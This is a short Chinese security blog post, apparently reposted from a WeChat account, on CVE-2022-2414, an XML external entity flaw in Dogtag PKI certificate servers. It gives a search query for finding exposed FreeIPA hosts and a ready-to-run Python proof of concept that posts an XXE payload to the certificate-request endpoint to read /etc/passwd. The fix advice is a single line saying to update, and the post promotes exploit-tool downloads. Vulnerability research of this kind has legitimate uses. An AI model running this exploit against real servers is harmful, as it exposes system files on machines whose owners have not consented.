CVE-2022-2414:Dogtag_PKI XML实体注入

渗透技巧 2个月前 admin
150 0 0

CVE-2022-2414:Dogtag_PKI XML实体注入

遵纪守法

任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得危害网络安全,不得利用网络从事危害国家安全、荣誉和利益

漏洞描述

Dogtag PKI 的XML解析器爆出安全漏洞,该漏洞源于在分析 XML 文档时访问外部实体可能会导致 XML 外部实体 (XXE) 攻击。此漏洞允许远程攻击者通过发送特制的 HTTP 请求来潜在地检索任意文件的内容。

风险等级

影响版本

v11.2.0-beta3前

资产确定

title="Identity Management" && body="FreeIPA"

漏洞复现

「POC」

import requests
import json

url = "https://YOUR_HOST/ca/rest/certrequests"

payload="""
<!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]>
<CertEnrollmentRequest>
<Attributes/>
<ProfileID>&ent;</ProfileID>
</CertEnrollmentRequest>
"""
headers = {'Content-Type': 'application/xml'}
response = requests.post(url, data=payload, headers=headers, verify=False)

print("Status Code", response.status_code)
print("XML Response:", response.text)

修复建议

修复建议:建议更新当前系统或软件至最新版

另外关注公众号后台回复“框架RCE”可获取常见框架漏洞利用工具后台回复“pentest”获取常用渗透测试工具集。回复“apk11获取apk测试工具集。

关注公众号

下面就是团队的公众号啦,更新的文章都会在第一时间推送在公众号

63篇原创内容

支持作者

CVE-2022-2414:Dogtag_PKI XML实体注入
于传播、利用本公众号CKCsec安全研究院所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,CKCsec安全研究院及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!

原文始发于微信公众号(CKCsec安全研究院):CVE-2022-2414:Dogtag_PKI XML实体注入

版权声明:admin 发表于 2022年12月9日 上午1:23。
转载请注明:CVE-2022-2414:Dogtag_PKI XML实体注入 | CTF导航

相关文章

暂无评论

暂无评论...